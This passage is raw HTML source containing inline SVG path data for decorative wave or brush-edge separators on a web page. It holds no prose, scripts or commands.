d=\"M914.6,41.3c4.4.8-1,.2,2.4,1-.1-.2,2.8.3,1.9-.1C916.3,41.8,916,41.1,914.6,41.3Z\"></path>\n <path d=\"M913,39.9h-.2c-1.3-.2-2.1-.3-2.9-.4a1.65,1.65,0,0,0-1-.2c2.6.4,1.2.6,4,1a.79.79,0,0,1,.4.1C914.8,40.4,913,40.2,913,39.9Z\"></path>\n <path d=\"M1110,68.2a8.32,8.32,0,0,1-2.1-.3,47.53,47.53,0,0,0,5.6,1.7C1112.2,69.1,1112.9,68.8,1110,68.2Z\"></path>\n <path d=\"M1110.9,68.2c-.6-.1-1.3-.2-1.1-.3-.1-.2,1.8.2,2,.1-2.5-.8-5.9-.7-2.9,0C1107.8,67.5,1114.3,69,1110.9,68.2Z\"></path>\n <path d=\"M914.9,35.7c0-.3-.3-.7-1.9-1.1-.2,0-.4-.1-.6-.1.3.1.4.2.6.2.4.2.4.2,0,.2-.7,0-2.2-.3-3.4-.3a26.29,26.29,0,0,1,3.4.7A11.06,11.06,0,0,1,914.9,35.7Z\"></path>\n <path d=\"M1108.1,64.3c-6.2-1.3,3.4-.4-2.7-1.7-1.6.5-3.4,1.2-3.8,2.3C1107.1,65.3,1102.6,63.7,1108.1,64.3Z\"></path>\n <path d=\"M929.5,31.6c.8.2,1.3.3,1.2.4-1.8-.3-6.1-.8-3-.2C930,32.3,933.8,32.1,929.5,31.6Z\"></path>\n <path d=\"M916.6,29.1c2.9.7-2.7.2.4.8.9-.1,1.9-.1,2.8-.2C917.1,29.4,917.6,28.8,916.6,29.1Z\"></path>\n <path d=\"M1223.2,80.6q2.4-.75,3-1.8c-3.4-.6-1.1-.8-5.5-1.5C1227.7,79.1,1219.5,79.2,1223.2,80.6Z\"></path>\n <path d=\"M913.1,27.8a16.64,16.64,0,0,0-2-.1,11.37,11.37,0,0,0,2,.3,19,19,0,0,1,3.2.3c.7-.1-1.6-.6-3.2-.9a6.86,6.86,0,0,0-1.2-.1c.5.1.8.1,1.2.2C914.8,27.9,914.2,27.9,913.1,27.8Z\"></path>\n <path d=\"M1113.5,59.1c-7.1-.8,3.5,0-4.5-1.3-1.2.8-2.2.5-1.3,1.3C1111.2,59.4,1109.6,58.9,1113.5,59.1Z\"></path>\n <path d=\"M937.1,29.3a47.91,47.91,0,0,0-6.1-.6c.7.1,4.2,1,4.2.7C931.4,28.7,937.7,29.7,937.1,29.3Z\"></path>\n <path d=\"M1114.4,56.8a10.11,10.11,0,0,1-3-.3c.1.3,2,.7,1.4.9-3.1-.5-.5.1-4-.3,2.9.4-2.4,0,1.3.7,0-.2,3.4.5,3,.2a10.32,10.32,0,0,1-2.2-.5c1.6.2,3.9.7,4.1.6-2.9-.7,3-.3-1.5-1.1C1115.1,57.2,1116.2,57.2,1114.4,56.8Z\"></path>\n <path d=\"M935.2,25.3c-.3.2,2,.6,1.3.8,5.2.9.4-.3,2.9,0s1.3.5,3.3.9C943.3,26.4,936.9,25.7,935.2,25.3Z\"></path>\n <path d=\"M1109.9,53.4c4.6.7,3,.9,2.9,1.2-.5.1-.6.2-.1.4h1.3a4.42,4.42,0,0,0,.5.1c-.1,0,0-.1-.1-.1h1a10.52,10.52,0,0,1,1.1.3c0-.2.2-.3.3-.4.9-.1,1.1-.3-.3-.5-.3,0-.6.1-1,.1a11.26,11.26,0,0,1-1.4-.3c.5-.4,2.4.1,3.9.1-1.7-.2-7.2-1.6-5.4-1.1C1115.4,53.9,1111.7,53.6,1109.9,53.4Z\"></path>\n <path d=\"M919,17.6c1.4.3,2.1.5,4.2.8,2.1,0-1.4-.8,1.7-.5C921.8,17.7,919.7,17.1,919,17.6Z\"></path>\n <path d=\"M915.4,13.8c-.4.7,0,.7,2.6,1.4C918.8,15.4,916,13.8,915.4,13.8Z\"></path>\n <path d=\"M930.3,16.8a43.92,43.92,0,0,0-7.3-1.1c1.9.3,6.6,1.2,7.4,1.3C929.1,16.8,929.7,16.8,930.3,16.8Z\"></path>\n <path d=\"M921.6,10.5c3,1.2-5.7-.2-1.5,1C919.7,11,927.3,11.8,921.6,10.5Z\"></path>\n <path d=\"M1610.4,41.7c1.3-.6-.6-.4-3.6-.6-.1-.1-.2-.1-1.1-.1.1.1.1.2.2.3C1610.6,41.1,1608.7,42.1,1610.4,41.7Z\"></path>\n <path d=\"M1599.6,41.3c1.8,0,3.3.1,4.3.2C1604.4,41.1,1599.1,40.8,1599.6,41.3Z\"></path>\n <path d=\"M1575.5,44.5c-.8.4,1.8,1.1,4.7.8C1575.8,45.1,1580.3,44.7,1575.5,44.5Z\"></path>\n <path d=\"M934.8,31.5a24.37,24.37,0,0,1-2.7-.1c-1.9-.3-2.4-.6-5-1a17.39,17.39,0,0,0,3.9.9h-1.4c-.1.3,2.4.3,4.5.4C933.8,31.6,934.2,31.5,934.8,31.5Z\"></path>\n <path d=\"M916.9,31.4c1.1,0,2.1,0,3.2.1.8-.3-3.4-.2-5.5-.3,1.1.2-.4.3-1.2.4-.1,0-.2-.1-.4-.1h-.1c0,.1.1.2.1.3s.1.2.2.3c1.6.3,2.7.6,4.3.9-1-.5,1.3-.1.8-.4-3.5-.7-.6.3-4.1-.5-.2-.1,0-.3-.4-.4H915C916.7,31.7,915.4,31.4,916.9,31.4Z\"></path>\n <path d=\"M1598.8,48c.3.7,1.4.8.9,1.3C1603.6,49.2,1601.2,48.2,1598.8,48Z\"></path>\n <path d=\"M1592.1,49c.7.4,0,.6-.5.9C1595,49.9,1595.8,49.1,1592.1,49Z\"></path>\n <path d=\"M1517.1,49.7c-4.1,0-3-.5-5.7-.7.8.5.9.7,3.9,1.2C1516.3,50.1,1516.1,49.9,1517.1,49.7Z\"></path>\n <path d=\"M1681.5,54.1c2.2-.1-.6-.7-2.6-.8C1681,53.7,1678.1,54.1,1681.5,54.1Z\"></path>\n <path d=\"M1561.2,51.4c1.9.6-.8,1.2.2,1.9,2.6.1,5.1.1,6.3,0C1563.5,52.8,1568.4,51.8,1561.2,51.4Z\"></path>\n <path d=\"M1514.2,54.9c.7.4-.8.9,2.8,1C1514.1,55.5,1518.7,55.1,1514.2,54.9Z\"></path>\n <path d=\"M1488.4,55.5c5.5,0,3.5.6,7.8.7-2.8-.6-3.3-.9-2.9-1.3C1492.4,55.2,1489.3,55.2,1488.4,55.5Z\"></path>\n <path d=\"M1568,56.9a20.32,20.32,0,0,0-4.6-.5A9.14,9.14,0,0,0,1568,56.9Z\"></path>\n <path d=\"M1516,56c-1.7.1-.6.6,1.5.7-.1-.1,1.8-.1,2-.2C1515.4,56.6,1518.8,56.1,1516,56Z\"></path>\n <path d=\"M1471.7,55.6c-1.4,0-2.8-.1-4.3-.1a5.58,5.58,0,0,0,2.6.8C1472.3,56.2,1472.3,55.9,1471.7,55.6Z\"></path>\n <path d=\"M1474.6,56.8c-2-.4,3.4-.8-1.6-.9,1.4.6-.8.7-2.5.9C1472.5,56.9,1472.7,56.8,1474.6,56.8Z\"></path>\n <path d=\"M1519.1,57.6c-2.5-.1-2.6-.3-1.4-.5-1.1,0-2.1,0-3.2-.1C1513.4,57.5,1517.5,57.9,1519.1,57.6Z\"></path>\n <path d=\"M1570.1,58.6c.1.2-2.4.6.5.8C1570.5,59.2,1573.1,58.8,1570.1,58.6Z\"></path>\n <path d=\"M1517.2,57.9c.4.4,1.2.7,4.7.8C1521.4,58.3,1518.7,58.2,1517.2,57.9Z\"></path>\n <path d=\"M1418,56.7c2.3.1,2.5.3,2.5.6,1.6,0,3.9.1,4.2,0-3.3-.2-3.6-.4-1.4-.6A29.32,29.32,0,0,0,1418,56.7Z\"></path>\n <path d=\"M1565.7,59.8c.2.6,6.9.3,7.4,0C1569.6,59.7,1569.4,60,1565.7,59.8Z\"></path>\n <path d=\"M1514.9,59.2c5,.2,4.7.1,8.6.4,0-.1.1-.1,1-.1,0-.1-.1-.1-.1-.2C1521.7,59.2,1516.5,58.9,1514.9,59.2Z\"></path>\n <path d=\"M1401.7,57.6c-2.5.7,13.8.6,9.6.2C1409.8,58,1403.9,57.7,1401.7,57.6Z\"></path>\n <path d=\"M1481.8,59.7c-.5.2-1.4.2-1.8.4,2,0,2.4.2,4.3.2C1484.3,60,1484.1,59.8,1481.8,59.7Z\"></path>\n <path d=\"M1537,60.9c-.1.5-1.2.7.7,1,.9-.2,4.6-.1,3.9-.5C1539.9,61.3,1540,61,1537,60.9Z\"></path>\n <path d=\"M1190,54.5c.1-.2,1.6-.2,1.9-.3-5.3.1-2.5-.2-6.5-.4,2.6.5-1,.7-.2,1.3,4.2.1,11.3-.3,5.8-.8C1191.2,54.6,1190.7,54.7,1190,54.5Z\"></path>\n <path d=\"M1516.7,61.8a8.24,8.24,0,0,0-3.6-.7C1513.7,61.4,1513.4,61.8,1516.7,61.8Z\"></path>\n <path d=\"M1395.9,59.9c4.2.2,6.4-.3,3.8-.6C1400.2,59.7,1396.4,59.6,1395.9,59.9Z\"></path>\n <path d=\"M1474.1,63.9c4.2-.5,8.4-1.6,4.5-2.7C1479.7,62.3,1473.1,63.1,1474.1,63.9Z\"></path>\n <path d=\"M1355.1,60.1c-4.5,0-1.6-.7-6.7-.7,2.2.5,6.2,1.2.9,1.4,1.7.2,4.6.1,6.4.1C1353.9,60.6,1355,60.5,1355.1,60.1Z\"></path>\n <path d=\"M1360.4,60.1h-2.1c.1.1-.8.1-.9.2,2.1.1,2.8.3,5.5.3,1.4-.4-3.7-.1-3.4-.4C1360,60.2,1360.6,60.2,1360.4,60.1Z\"></path>\n <path d=\"M1114.1,55.5a60.9,60.9,0,0,0-7.4,0c2.8.3,2.8.6-.6.6C1112.2,56.5,1113.4,56,1114.1,55.5Z\"></path>\n <path d=\"M1295.9,59.3c.7.2-.9.6,1.5.7C1298.2,60,1299.7,59.3,1295.9,59.3Z\"></path>\n <path d=\"M1452.1,64c-.8-.3-1.3-.6-4.6-.6C1445.9,63.5,1448,64,1452.1,64Z\"></path>\n <path d=\"M1451.1,64.1c-.1.4,2.6.5,3.6.7,1.9-.2-1-.3-.4-.7Z\"></path>\n <path d=\"M1563.4,80.3c-1.6.1-.1.5,1.5.7C1565.7,80.9,1567.2,80.2,1563.4,80.3Z\"></path>\n <path d=\"M1551,82.2c.1.5-2.5.7-3.5,1.1a23.4,23.4,0,0,0,6.2-.1c-1.2-.1-2.3-.3-3.4-.4C1552.3,82.9,1554.5,82.1,1551,82.2Z\"></path>\n <path d=\"M1535.9,89.5h0c5.3-.1,8-.5,9.8-1-2.3-.2-4.7-.1-7.6-.4C1539.5,88.8,1533,89,1535.9,89.5Z\"></path>\n <path d=\"M1400.3,58.5a16.38,16.38,0,0,0,2.2.3C1401.9,58.7,1401.1,58.6,1400.3,58.5Z\"></path>\n <path d=\"M1616.7,41.6c-1.3,0-2.5,0-2,.2,6,.1,2.4-.5,1.7-.6C1615.2,41.3,1615.3,41.5,1616.7,41.6Z\"></path>\n <path d=\"M1591.6,41.9c.2-.5,7.7-.2,2.7-.7,2.6-.1,10-.6,2.5-.9C1595.2,40.7,1590.5,41.4,1591.6,41.9Z\"></path>\n <path d=\"M1594.6,43.3c1.8-.3.8-1.3,6.8-.8,0-.3-3.2-.3-4.5-.5-1.4,0,.1.4-1.8.4-1.3,0-1.3-.2-1.3-.4a37.36,37.36,0,0,0-4.1.1c5,0,1.3.5,4.8.9a28.68,28.68,0,0,1-5.4-.2c0-.1,1.3-.1.9-.3-4.5.2-3-.4-6.7-.6-2.1.2,1,.4,2.5.6a19.52,19.52,0,0,1-5.9.6c-.1-.2-1-.3-2.3-.4-1.1.1-3.3.2-2.8.5,2.6.1,2.2-.2,5.2,0-3.1.2,1.1.5-4,.2-.2.3-1.8.4.4.7,2.1-.1,4.2-.1,6.2-.2-1.6-.1-1.2-.3-1.4-.5,3.3.2,1.7-.2,1.8-.4h3.1c.1.3.9.6,2.6.8.5-.3,3.1-.1,4.3.1.2-.3,6.9-.3,3.7-.7A7,7,0,0,1,1594.6,43.3Z\"></path>\n <path d=\"M1695,42.7c-1.3.4-3.1.7-7,.5,2,.1,1,.4,3.4.4,1-.2,4.2.2,5.2-.1C1691.4,43.3,1697.6,42.9,1695,42.7Z\"></path>\n <path d=\"M1564,54.1c3.9.3,3.2,1.4,3.3.2-.3-.2-4.1-1-2.5-.6C1565,53.9,1564.8,54,1564,54.1Z\"></path>\n <path d=\"M1473.5,55a5.11,5.11,0,0,0,2.4.5c3.8,0-3.3-1.5,4.7-.9-.3-.4-2.3-.9-1.5-.7-.7.4-2.3,0-4.3-.1C1472,54.2,1478.2,55,1473.5,55Z\"></path>\n <path d=\"M1301.6,58.5c.2.1,1.5.2,1.3.4a7.36,7.36,0,0,0-3.1,0c1.7,0,.8.3,2.3.4C1303.9,59.1,1304,58.3,1301.6,58.5Z\"></path>\n <path d=\"M1498.8,64.8c1.1.1,4,.1,3.4.4-.6,0-1.2.1.1.1.7-.3,1.5-.1,4.2,0,1.4-.4-3.7-.1-3.4-.4,1.8,0-1.6-.4,3-.3,2.7.1,1.8.5,4.5.5,1.7-.1-.1-.6,1.6-.7-5.3,0-3.6-1.5-10.7-2C1499.8,63.4,1501,64.2,1498.8,64.8Z\"></path>\n <path d=\"M1492.8,65.3a18.25,18.25,0,0,1-3.3-.3c-2.4.2,1.9.3,2.5.6-.4,0-5.1.1-2,.2,1.4,0,1.4-.1,3.1,0C1493,65.4,1491.2,65.5,1492.8,65.3Z\"></path>\n <path d=\"M1567.4,82.7c.4-.3.1-.5-3.8-.6-.2.2-.1.3,0,.5-11.8.6-10.3,2.7-18.2,3.8,3,.1,2-.2,4.1-.1,2.9.4-.3.6.7,1,3.8-.2,6.4-.5,8.9-.8,2.3.1,3.2.3,6.5.4C1570.7,85.8,1580.1,83.8,1567.4,82.7Z\"></path>\n <path d=\"M1541.6,87c1.1.2,4.4.2,3.6.6-4.3,0-5.3-.2-6.6-.5,1,.4-1.6.3-.6.6,5.3.1,6.7-.2,10.3-.2a6.85,6.85,0,0,1-2.7-.9A15,15,0,0,0,1541.6,87Z\"></path>\n <path d=\"M1349.4,59.4c3.9.3.4-.4,3-.3-.7.7,3.9.3,1.6.9,6.3-.1,3.7-1.3-2.1-1.6.4-.3,4.1-.7,1.5-1a12.2,12.2,0,0,1-6-1.2c1.6,0,4,.1,4.2,0-8.7-.2-4.5-1.6-8.6-1.9C1343.5,56.1,1351.5,57.7,1349.4,59.4Z\"></path>\n <path d=\"M1448.4,72.8c1.8,0,3.5.1,5.3.1,6.1-.5-3.1-1.7,2-1.8-7.4-.3-3.4-1-8.2-1.4,2.5-.2,5.2.2,6.2-.1-1.6-.5-8.1-.6-8.2-1.3,2.1,0,1.1-.3,4.1-.1-1.7-.5-.6-.5.5-.9-7.1-.5-.5-1.9-9-2.5,2.5.9,7.8,3.1-.9,3.4a14.08,14.08,0,0,0-4.2,0c1.6.1,4.2.2,3.5.5-12.8.2-2,2.7,2.3,3.5-1,0-2.07,0-3.1,0,4.2.3,5.2.8,9.1,1.1C1449.8,73.2,1449.3,73,1448.4,72.8Z\"></path>\n <path d=\"M1579.1,77c-1.8,0,.4.5-1.8.5s-1.5-.3-4.4-.3c.9.3-2.1.2-3,.3,2.5.7-.3.7-2.5,1,.5.2,3,.3,3.5.5-2.3.4-6.6.5-7.7,1,6.4.2,5.1-.2,11.5-.1.5-.3-.2-.8,2.6-.8-.6.4,1.3.5,3.6.6-.7-.4-.7-.8,2.7-.7C1583.3,78.2,1581.9,77.6,1579.1,77Z\"></path>\n </svg>\n </div>\n <div class=\"h-separator\" style=\"height: 121px; bottom: 0px;\">\n <svg style=\"fill:white;transform:rotateX(180deg);\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1920 120.77\" preserveAspectRatio=\"xMidYMax slice\">\n <path d=\"M569.37,67.57c1.56,0,2.79.05,4,0,1.43-.07,2.86-.24,4.29-.36A24,24,0,0,0,574,64.28C570.65,62.58,569.09,63.81,569.37,67.57Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M571.07,60.51l-3.93-.7-.24,3,4.09-.37C571,61.82,571,61.17,571.07,60.51Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M602,70.4c1.74.47,3.51.81,5.28,1.17l.39-2.1-5.51-.87A9.61,9.61,0,0,0,602,70.4Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M474.07,102c-2.15-.7-4.42-1-5.84,2.23,2.34.53,4.31,2.49,6.5.22A2.79,2.79,0,0,0,474.07,102Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M799.31,23c-.71-.12-1.29-1-2-1.17-1.14-.21-3.19-.42-3.36,0a12.07,12.07,0,0,0-.71,4.87,4.59,4.59,0,0,0,3.1.52c2.12-.83,3.24-.36,3.73,1.81.19.88.13,1.95.62,2.58a5.36,5.36,0,0,0,2.64,1.81c.37.1,1.11-1.18,1.63-1.76C803.7,28,804.22,23.75,799.31,23Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M13.9,65.4l-.6-1.25c-1.06-2.59,1-4.49,4.66-4.33,8.51-.84,17-1.62,25.52-2.54,2.1-.23,4.14-1.27,6.22-1.3A66.38,66.38,0,0,1,58,56.8l1.31-.23A7.68,7.68,0,0,1,67,54.46a3.11,3.11,0,0,0,2.58-.66,5.37,5.37,0,0,1,6.17-1.43,2,2,0,0,0,1,.2q8.63-1.38,17.24-2.8c2.43-.4,4.84-1,7.29-1.15s5.08-.07,7.63-.08l17.77,0c.67,0,1.66.31,2,0,2.76-3,5.81-1.26,8.83-.74,3.65.63,4.85-.35,5.7-3.95.24-1,1.18-2.59,1.78-2.58a4.87,4.87,0,0,1,3.17,1.67c1.67,1.9,2.95,4.14,4.57,6.09a4.51,4.51,0,0,0,2.55,1.41,24.07,24.07,0,0,0,6.73.53c6.42-.86,12.56.17,18.8,1.53,3.93.85,8.09.6,12.13,1,3.2.33,6.38.93,9.58,1.41l14,2.19c1.59-.23,3.22-.8,4.77-.64,5.65.6,11.29,1.4,16.92,2.21,1.75.25,3.44.88,5.2,1.13,3,.41,6,1.06,9,.87s5.86-.94,8.74,1.16c.81.59,3.42-.53,4.71-1.52,1.76-1.35,3-1.64,5.11-.57,2.44,1.22,5.3,1.6,8.24,2.42.28-2.43.38-4.31.76-6.12a2.21,2.21,0,0,1,1.5-1.47c.49,0,1.26.79,1.54,1.4,1.48,3.31,3.71,4.81,7.51,4.46,4.43-.41,8.85-1.07,13.27-1.57A4.73,4.73,0,0,1,306,59c5.66,2.7,11.74,3.44,17.88,3.9.11,0,.25,0,.33,0,4.79,3.34,10.15,4.24,15.85,3.8.12,0,.26.33.4.51l1.34.53,2.1,1.4,2.6-1.71c.92-.41,1.93-1.31,2.73-1.16,1.83.36,3.65.81,5.48,1.14,4.16.74,8.33.8,12.54-2.69L366,69.46l5.8-2.54,5.48-2.41c-3.7-1.64-4.16-4.87-4-8.14a5.29,5.29,0,0,1,.88-2.44c1.07,1.15,2.13,2.3,3.21,3.45,1.76.14,3.51.31,5.26.47a24.63,24.63,0,0,1,1.44,4c.35,1,.65,2,1,3a12,12,0,0,0,2.57-1.65c2.29-2.46,2.93-.14,3.93,1.23l3.46-.87c.73-1.42,1.34-2.92,2.12-4.31l3.08.31c1.89.2,3.68,1.35,5.51,2.06l24.57,3.25c.33,0,.73-.08,1,0,7.53,3.52,15.78,1,23.59,2.89,6.56,1.6,13.44,1.92,20.18,2.81q5.69.45,11.36.88c1.22.08,2.44.09,3.66.14l.78-2c0-.68.05-1.35.08-2q1.28-3.8,2.53-7.59l.94-1.85,4-3c-1.83-.66-3.78-2.12-5.41-1.83-6.92,1.23-13.43-1-20.11-1.79a88.07,88.07,0,0,1-12.06-2.33A47.15,47.15,0,0,1,484,46.55h2.76l6.75.09h1.36L507.12,48l1.32,0,19.06,2h2.06l34.16.94,1.29-.43c3.65-2.87,7.6-2.47,11.64-1.06l2.08.28,1.23-.66,6.83-3.34c.21-.26.41-.71.64-.73,3.29-.25,6.59-.45,9.89-.64.13,0,.28.31.42.47l1.27.4c2,.15,3.07-3.37,5.53-1.37,2.37.12,4.73.25,7.1.34a6.49,6.49,0,0,0,3.64-.67l4.89,2.91a45.17,45.17,0,0,1-.64-4.91c-.11-4.8-.06-4.8-4.91-5.68-2.86,1.84-4.63,1.26-6.9-1.64a35,35,0,0,0-4.6-4.14L600,33.41c-.19,1.18.12,3.44-.83,4.27-1.64,1.44-4,2-5.94,2.85-.52-2.28-.42-4-1.25-4.78-.65-.59-2.49.35-3.7.11a45.78,45.78,0,0,1-5.58-1.79c-2.06.67-4.09,1.71-6.19,1.84-.78.05-1.69-2-2.55-3.08-.84,0-2-.41-2.46,0a9.67,9.67,0,0,0-2.74,3.41c-1.11,2.69-2.92,2.32-5.24,2.08-5.1-.51-10.26-.56-16-.84.14.23-.21-.32-.52-.89-1.87-3.42-2.7-3.45-5.28-.44a4.91,4.91,0,0,1-2.4,1.38c-1.74.47-3.55.7-5.33,1l.15.91-3.69-1.58c.27-2,.49-3.68,3.37-4,1-.12,2.5-2.31,2.49-3.53,0-3.35,1.14-4.84,4.5-5.42,2.74-.48,5.26-2.07,8-2.84,3.69-1.05,7.49-1.69,11.2-2.67,8.15-2.14,16.27-4.4,24.41-6.56a7,7,0,0,1,3.33-.25c5.24,1.31,10-.23,14.91-1.84,3.07-1,6.29-1.54,9.45-2.28h2c5.23-.29,10.46-.6,15.7-.83.86,0,1.77.44,2.6.31,4.53-.71,9-1.53,13.55-2.35,1.54-.28,3.06-.67,4.87-1.06,1,3,3.55,2.85,6,2.06,8.74-2.89,17.68-3.48,26.8-2.94,6.21.37,12.45.32,18.67.68,1.39.08,2.73,1.1,4.09,1.68C709,5,711.7,2.68,714.63,5.67a1,1,0,0,0,1-.09c3.33-3.17,7.5-2.06,11.32-2,15.24.32,30.54.25,45.71,1.53,17.76,1.49,35.42,4.22,53.11,6.46a79.56,79.56,0,0,1,9,1.52,34.57,34.57,0,0,1,5.42,2.36c2.63-3.91,6.11,0,9.47.45l1.28.27c15.94,3.63,31.9,7.22,47.83,10.93,3.21.75,6.31,2,9.46,3.05l1.33.23q10.69,3.14,21.41,6.26c4.35,1.26,8.73,2.42,13.07,3.7,5.72,1.69,11.4,3.5,17.13,5.15,2.37.69,5.11.57,7.19,1.72,6.21,3.44,12.72.42,19,1.37s12.79,1.39,19.21,1.87c8,.58,16,1.29,23.93,1.35a132.33,132.33,0,0,0,17.88-1.43c1.88-.24,3.6-1.73,5.4-2.65,1.62-1.12,3.8-1.93,6-3.77,2.88-3.15,6.07-2.08,9.72-2.38,2.19-.18,4.34-.75,6.51-1.12a49.53,49.53,0,0,1,5.76-.89c2.43-.15,5-.75,7.3-.27a6.77,6.77,0,0,1,3.62,2.76,57.36,57.36,0,0,1,3.5,6.27,1.17,1.17,0,0,0,1.25.22c4.37-5,4.16-5.45,9-.47a8.74,8.74,0,0,0,5.33,2.21c5.07.32,6.5,2.41,4.33,6.9a26.08,26.08,0,0,0-1.58,4.47c-.91,3.32-.07,3.48,3.39,2.65l1.22,0,2.2,0c3.32-1.9,6.71-2.49,10.37-.87a5.91,5.91,0,0,0,2.61,0c2.11-.17,4.22-.49,6.33-.54,4-.08,8.08,0,12.12,0,7.89.08,15.79.14,23.68.32,6.09.13,12.19.29,18.27.68,7,.45,13.91,1.25,20.88,1.76,2.92.21,5.87,0,8.8.06a13.19,13.19,0,0,1,4,.24c6.31,2.22,12.79,2,19.37,2.17,10.34.27,20.68,1.3,31,2.58,3,.37,6.89-12.55,9.18-11,1.32.89,12.9,3.57,12.9,3.57s.31-8.06,15.63-1.73c.66.27,10.09-4.48,10.79-4.37.44.14,1.15,2.47,1.58,2.61,1.42.17.69-7.18,2.11-7.2,16.22-.26,15.65.29,15.23.43l4.25-1.2s8.6-5.21,12.58-5.19a7.81,7.81,0,0,1,.94-1.51,4.11,4.11,0,0,0,.46.94c.33.5,2,.15,3,.14l.12,0c2,3.77,3.14,11,3.63,4,.07-1.21.31-3.35.7-6.28,3-.77,6.13-.13,9.28.62a7.88,7.88,0,0,1,2.6.64,4.88,4.88,0,0,1,2,2.31,60.15,60.15,0,0,1,1.34,6.22c4.32-1.57,8-2,12.06-.48,2.13.78,4.92-.48,7.38-.33s4.66.92,7.54,1.54c.72-1,1.81-2.64,2.82-4.13l4.43,3.18,0,0c.25-.81.51-1.61.76-2.42,1.93.71,3.59,1.21,5.14,1.92a4.61,4.61,0,0,0,5-.26c.59-.41,2-.08,2.78.29,3.84,1.71,7.59,2.6,11.47.11a2.26,2.26,0,0,1,1.89.12c4.53,2.45,9.29,2.22,14.13,1.42a3.25,3.25,0,0,1,1.64.14c5.87,2.35,11.49.87,17.18-.85a11.57,11.57,0,0,1,5-.06c2.39.4,4.72,1.66,7.09,1.67,3.16,0,4.21,1.44,4.1,4.6,1.12-2,1.7-4,3-5.11s3.43-2,5,.87c-1.25,1.36-2.58,2.81-4.34,4.75l5.16.85c2.4-4.06,3.67-4.4,8.55-3.34,1.08.24,2.49-.73,3.68-1.29,1-.47,2.23-1.88,2.76-1.63,3.59,1.73,8.2,1.09,11,4.73.5.64,1.75.76,2.69,1,1.16.26,2.36.37,3.54.54l1.73-1c.19-.27.45-.8.55-.77,2.78.8,4.73-.29,6.38-2.48a3.27,3.27,0,0,1,2.34.91c1.38,2,2.94,2.06,5.24,1.75,3.19-.43,6.51.16,9.76,0,2.6-.09,5.18-.8,7.78-.85a38,38,0,0,1,9.55.55c2.58.62,4.75,1.12,7.47.28,2.24-.69,4.92,0,7.4.15,2.91-1.39,5.85-2.73,8.73-4.18,2.7-1.37,5.19-3.5,8.64-1.62.21-3.15,2.3-3.62,4.6-3.8,5-.54,10-1.12,15-1.55.75-.07,1.56.56,2.34.86l1.19.25c4.38-1.37,5.63-1,8.1,2.84,1.7,2.64,4.23,3.13,7,3.14,5,0,5.52.61,4.39,5.07-.7,2.76.68,4.28,3.32,3.67,3.21-.74,4,.15,5,5.53a9.44,9.44,0,0,0,2.19-.11c4-1.13,4.94-.62,6.42,3.34.38,1,.92,2,1.39,3a28.51,28.51,0,0,1,15.36,3.26,26.81,26.81,0,0,0,7,3c1,.21,2.45-1.48,3.7-2.3-.13-.31-.25-.63-.38-.94,1.71.44,3.42.86,5.13,1.31,2.25.58,4.25,1.89,6.69-.37,1.57-1.45,3.87-.37,5.21,1.56a.38.38,0,0,1,.25.27c2.24,1.52,7.57,1.76,9.59.42,2.33-1.55,3.63-.44,4.84,1.62,1.83,3.13,3.85,6.14,5.79,9.2l.67.18,2.77-.67h0c.6-1.35.88-3.39,1.88-3.84s2.62.88,4,1.37c1.18.43,2.38.8,3.57,1.19l.72-.74c-.37-1.73-.75-3.47-1.12-5.2l.63-.64c1.89,1.52,3.79,3,5.9,4.71l1-3.54,5,5.65c.67-2.08,1-3.29,1.59-5l7.26,7.64,4.83-3.54c.84,1.18,1.84,2.57,2.4,3.34,2-.65,3.7-1.25,5.41-1.7,2.5-.66,5-1.2,7.54-1.8l1.31-.91c0-.48.11-1,.23-2l1.08,1.71.76.53a15.34,15.34,0,0,0,9.54,4.36l1.86-1c.08-1.19.16-2.38.29-4.23,2.22,1.5,3.32,5.15,6.44,2.81L1815,92c2.37-1,4.78-1.88,7.06-3a13.68,13.68,0,0,0,2.71-2.53c.27.13.93.26,1,.53,1,4.54,5.54,4.74,8.52,6.81a2.14,2.14,0,0,0,2.07-.29c1.54-2.23,3.15-1.64,4.89-.42l1.45.44,8,.57.95-1.13c2.4,1.21,4.47,4.12,7.25.82.12-.15,1,.49,1.46.44,2.68-.26,5.39.31,7.94-1.61,1.18-.89,3.71-.85,5.22-.23,2.13.87,3.88,2.66,6,4.25,2.45-2.2,5.24-3,8.11-.22a1.27,1.27,0,0,0,.94.32c7.53-1.47,11.48,4,16.11,8.24l1.19.76.25.16c2.4-.85,4.72-2.61,7.11-3.61a16.85,16.85,0,0,0,5.31-.39,7.17,7.17,0,0,1,1.47.73V0H0V61.35C7.17,64.37,14.69,67.61,13.9,65.4Z\"\n transform=\"translate(0 0)\"></path>\n <path d=\"M578.73,49.78c-.71.36-1.4.75-2.11,1.12C577.33,50.53,578,50.14,578.73,49.78Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1346.24,53l-.13,0Z\" transform=\"translate(0 0)\"></path>\n <path d=\"M1366.87,57.76c-.79-.16-1.57-.35-2.35-.56q-.45,1.17-1,2.37a11.27,11.27,0,0,1,3.33,2.15A5.14,5.14,0,0,1,1366.87,57.76Z\" transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path d=\"M1358.64,55.7c-2.72-.47-5.42-1.38-8.11-2.09a20.91,20.91,0,0,0-5.31,1.38l-2.37-2.32a49.11,49.11,0,0,1-9.39-.28c-1.41-.22-2.83-.34-4.24-.51.42.31.8.8,1.27.91,4.07,1,7.9,2.53,12.35,2.59,4.94.07,9.84,2,14.78,3.07,1.64.35,3.48.1,5,.73l.74.33c-.23-.94-.46-1.88-.7-2.84A37.55,37.55,0,0,0,1358.64,55.7Z\"\n transform=\"translate(0 0)\" opacity=\"0.3\"></path>\n <path 